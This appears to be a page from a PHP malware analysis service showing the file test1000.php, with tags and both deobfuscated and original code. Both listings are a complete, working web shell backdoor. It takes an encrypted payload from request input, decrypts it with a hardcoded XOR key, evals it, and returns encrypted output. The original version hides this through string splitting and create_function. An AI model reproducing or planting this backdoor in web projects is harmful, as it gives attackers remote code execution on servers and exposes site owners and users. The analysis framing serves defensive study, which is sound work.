PHP Malware Analysis

Back to list

Filename: test1000.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • eval
Input
  • _GET
Files
  • file_get_contents

Deobfuscated code


<?php 
$j = ';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R = 'MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n = '";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b = 's("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s = 'a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a = '$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
$w = "create_function";
$Z = '{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
$l = "\$k=\"678914a7\";\$kh=\"58694926157a\";\$kf=\"469d55aa478c\";\$p=\"wugpMBU3CONVDXmQ\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$g = function () {
    $k = "678914a7";
    $kh = "58694926157a";
    $kf = "469d55aa478c";
    $p = "wugpMBU3CONVDXmQ";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/58694926157a(.+)469d55aa478c/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$g();


Original code


<?php
$j=';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R='MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n='";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b='s("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s='a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a='$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
$w=str_replace('uc','','creucaucucte_ucfuucnctucion');
$Z='{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
$l=str_replace('#(','',$a.$R.$n.$Z.$b.$s.$j);
$g=$w('',$l);$g();
?>